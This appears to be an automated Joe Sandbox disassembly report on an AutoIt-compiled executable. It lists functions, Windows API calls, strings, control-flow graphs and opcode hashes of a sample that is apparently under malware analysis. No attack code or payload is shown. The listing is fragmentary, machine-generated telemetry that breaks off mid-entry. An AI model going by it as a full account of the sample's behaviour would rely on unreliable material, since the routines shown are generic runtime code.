                                                                              • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: 0vH$4RH
                                                                              • API String ID: 1143807570-2085553193
                                                                              • Opcode ID: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                                                                              • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                              • Opcode Fuzzy Hash: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                                                                              • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                              Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1266 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1275 40e506-40e509 1266->1275 1276 42accc-42acd1 1266->1276 1279 40e540-40e555 call 40ee70 1275->1279 1280 40e50b-40e51c 1275->1280 1277 42acd3-42acdb 1276->1277 1278 42acdd-42ace0 1276->1278 1281 42ad12-42ad20 1277->1281 1282 42ace2-42aceb 1278->1282 1283 42aced-42acf0 1278->1283 1297 40e557-40e573 GetCurrentProcess call 40ee30 1279->1297 1298 40e579-40e5a8 1279->1298 1284 40e522-40e525 1280->1284 1285 42ac9b-42aca7 1280->1285 1296 42ad28-42ad2d GetSystemInfo 1281->1296 1282->1281 1283->1281 1287 42acf2-42ad06 1283->1287 1284->1279 1288 40e527-40e537 1284->1288 1290 42acb2-42acba 1285->1290 1291 42aca9-42acad 1285->1291 1292 42ad08-42ad0c 1287->1292 1293 42ad0e 1287->1293 1294 42acbf-42acc7 1288->1294 1295 40e53d 1288->1295 1290->1279 1291->1279 1292->1281 1293->1281 1294->1279 1295->1279 1299 42ad38-42ad3d GetSystemInfo 1296->1299 1297->1298 1307 40e575 1297->1307 1298->1299 1300 40e5ae-40e5c3 call 40eee0 1298->1300 1300->1296 1305 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1300->1305 1310 40e5e0-40e5ef 1305->1310 1311 40e5dd-40e5de FreeLibrary 1305->1311 1307->1298 1312 40e5f1-40e5f2 FreeLibrary 1310->1312 1313 40e5f4-40e5ff 1310->1313 1311->1310 1312->1313
                                                                              APIs
                                                                              • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                              • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                              • String ID: pMH
                                                                              • API String ID: 2923339712-2522892712
                                                                              • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                              • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                              • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                              • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                              Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: IsThemeActive$uxtheme.dll
                                                                              • API String ID: 2574300362-3542929980
                                                                              • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                              • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                              • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                              • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                              Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                              • __wsplitpath.LIBCMT ref: 00410C61
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcsncat.LIBCMT ref: 00410C78
                                                                              • __wmakepath.LIBCMT ref: 00410C94
                                                                                • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • _wcscpy.LIBCMT ref: 00410CCC
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                              • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                              • _wcscat.LIBCMT ref: 00429C43
                                                                              • _wcslen.LIBCMT ref: 00429C55
                                                                              • _wcslen.LIBCMT ref: 00429C66
                                                                              • _wcscat.LIBCMT ref: 00429C80
                                                                              • _wcsncpy.LIBCMT ref: 00429CC0
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                              • API String ID: 1004883554-2276155026
                                                                              • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                              • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                              • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                              • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                              Function 004095C7 Relevance: 21.5, APIs: 14, Instructions: 539sleeptimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                              • timeGetTime.WINMM ref: 00409880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                              • String ID:
                                                                              • API String ID: 3219444185-0
                                                                              • Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                              • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                              • Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                              • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A
                                                                              Function 004161C2 Relevance: 21.1, APIs: 14, Instructions: 86COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1156 4161c2-4161d1 1157 4161d3-4161df 1156->1157 1158 4161fa 1156->1158 1157->1158 1159 4161e1-4161e8 1157->1159 1160 4161fd-416209 call 41aa31 1158->1160 1159->1158 1161 4161ea-4161f8 1159->1161 1164 416213-41621a call 416e29 1160->1164 1165 41620b-416212 call 41616a 1160->1165 1161->1160 1170 416224-416233 call 41843a call 41b669 1164->1170 1171 41621c-416223 call 41616a 1164->1171 1165->1164 1178 416235-41623c call 4117af 1170->1178 1179 41623d-416258 GetCommandLineW call 42235f call 4222b1 1170->1179 1171->1170 1178->1179 1186 416262-416269 call 422082 1179->1186 1187 41625a-416261 call 4117af 1179->1187 1192 416273-41627c call 41186e 1186->1192 1193 41626b-416272 call 4117af 1186->1193 1187->1186 1198 416285-41628d call 42203c 1192->1198 1199 41627e-416284 call 4117af 1192->1199 1193->1192 1204 416295-416297 1198->1204 1205 41628f-416293 1198->1205 1199->1198 1206 416298-4162a0 call 40d7f0 1204->1206 1205->1206 1208 4162a5-4162ab 1206->1208 1209 4162b3-41630f call 411a4b call 4171d1 1208->1209 1210 4162ad-4162ae call 411a1f 1208->1210 1210->1209
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                              • String ID:
                                                                              • API String ID: 2477803136-0
                                                                              • Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                                              • Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
                                                                              • Opcode Fuzzy Hash: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                                              • Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D
                                                                              Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_fseek_wcscpy
                                                                              • String ID: FILE
                                                                              • API String ID: 3888824918-3121273764
                                                                              • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                              • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                              • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                              • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                                                                              Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32 ref: 00410326
                                                                              • RegisterClassExW.USER32 ref: 00410359
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                              • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                              • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                              • ImageList_ReplaceIcon.COMCTL32(00AD1698,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                              • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                              • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                              • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                              Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                              • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                              • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                              • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                              • RegisterClassExW.USER32 ref: 004102C6
                                                                                • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00AD1698,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$PGH
                                                                              • API String ID: 423443420-3673556320
                                                                              • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                              • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                              • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                              • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                              Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • _fseek.LIBCMT ref: 004525DA
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                              • __fread_nolock.LIBCMT ref: 00452618
                                                                              • __fread_nolock.LIBCMT ref: 00452629
                                                                              • __fread_nolock.LIBCMT ref: 00452644
                                                                              • __fread_nolock.LIBCMT ref: 00452661
                                                                              • _fseek.LIBCMT ref: 0045267D
                                                                              • _malloc.LIBCMT ref: 00452689
                                                                              • _malloc.LIBCMT ref: 00452696
                                                                              • __fread_nolock.LIBCMT ref: 004526A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1911931848-0
                                                                              • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                              • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                              • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                              • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                                                                              Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1356 40f450-40f45c call 425210 1359 40f460-40f478 1356->1359 1359->1359 1360 40f47a-40f4a8 call 413990 call 410f70 1359->1360 1365 40f4b0-40f4d1 call 4151b0 1360->1365 1368 40f531 1365->1368 1369 40f4d3-40f4da 1365->1369 1372 40f536-40f540 1368->1372 1370 40f4dc-40f4de 1369->1370 1371 40f4fd-40f517 call 41557c 1369->1371 1373 40f4e0-40f4e2 1370->1373 1376 40f51c-40f51f 1371->1376 1375 40f4e6-40f4ed 1373->1375 1377 40f521-40f52c 1375->1377 1378 40f4ef-40f4f2 1375->1378 1376->1365 1381 40f543-40f54e 1377->1381 1382 40f52e-40f52f 1377->1382 1379 42937a-4293a0 call 41557c call 4151b0 1378->1379 1380 40f4f8-40f4fb 1378->1380 1393 4293a5-4293c3 call 4151d0 1379->1393 1380->1371 1380->1373 1383 40f550-40f553 1381->1383 1384 40f555-40f560 1381->1384 1382->1378 1383->1378 1386 429372 1384->1386 1387 40f566-40f571 1384->1387 1386->1379 1389 429361-429367 1387->1389 1390 40f577-40f57a 1387->1390 1389->1375 1392 42936d 1389->1392 1390->1378 1392->1386 1393->1372
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock_fseek_strcat
                                                                              • String ID: AU3!$EA06
                                                                              • API String ID: 3818483258-2658333250
                                                                              • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                              • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                              • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                              • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                                                                              Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1396 410130-410142 SHGetMalloc 1397 410148-410158 SHGetDesktopFolder 1396->1397 1398 42944f-429459 call 411691 1396->1398 1399 4101d1-4101e0 1397->1399 1400 41015a-410188 call 411691 1397->1400 1399->1398 1406 4101e6-4101ee 1399->1406 1408 4101c5-4101ce 1400->1408 1409 41018a-4101a1 SHGetPathFromIDListW 1400->1409 1408->1399 1410 4101a3-4101b1 call 411691 1409->1410 1411 4101b4-4101c0 1409->1411 1410->1411 1411->1408
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                              • String ID: C:\Users\user\Desktop\r6lOHDg9N9.exe
                                                                              • API String ID: 192938534-2106797220
                                                                              • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                              • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                              • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                              • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                              Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
